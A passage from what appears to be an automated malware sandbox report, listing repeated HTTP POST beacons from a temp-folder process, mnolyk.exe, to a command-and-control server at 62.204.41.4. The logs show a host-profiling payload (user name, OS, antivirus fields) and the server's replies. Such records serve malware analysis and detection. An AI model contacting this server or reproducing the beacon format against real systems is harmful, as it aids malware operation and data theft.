                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      247192.168.2.74997462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:05.733542919 CET700OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:05.799844980 CET700INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      248192.168.2.74997562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:05.978492975 CET701OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:06.042375088 CET701INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      249192.168.2.74997662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:06.213926077 CET702OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:06.283323050 CET702INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      25192.168.2.74974962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:03.660430908 CET457OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:03.726121902 CET457INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      250192.168.2.74997762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:06.464354992 CET703OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:06.529069901 CET703INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      251192.168.2.74997862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:06.699429989 CET704OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:06.766144037 CET704INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      252192.168.2.74997962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:06.951379061 CET705OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:07.014616966 CET705INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      253192.168.2.74998062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:07.211466074 CET706OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:07.280040979 CET706INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      254192.168.2.74998162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:07.544608116 CET707OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:07.616162062 CET707INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      255192.168.2.74998262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:07.790106058 CET708OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:07.854876995 CET708INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      256192.168.2.74998362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:08.027985096 CET709OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:08.095154047 CET709INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      257192.168.2.74998462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:08.277098894 CET710OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:08.341062069 CET710INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      258192.168.2.74998562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:08.510191917 CET711OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:08.573493004 CET711INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      259192.168.2.74998662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:08.750838995 CET712OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:08.815830946 CET712INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      26192.168.2.74975062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:03.933991909 CET458OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:03.998970985 CET458INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      260192.168.2.74998762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:08.994235992 CET713OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:09.058456898 CET713INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      261192.168.2.74998862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:09.232773066 CET714OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:09.298605919 CET714INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      262192.168.2.74998962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:09.476583958 CET715OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:09.540498972 CET715INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      263192.168.2.74999062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:09.711791992 CET716OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:09.775254011 CET716INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      264192.168.2.74999162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:09.959911108 CET717OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
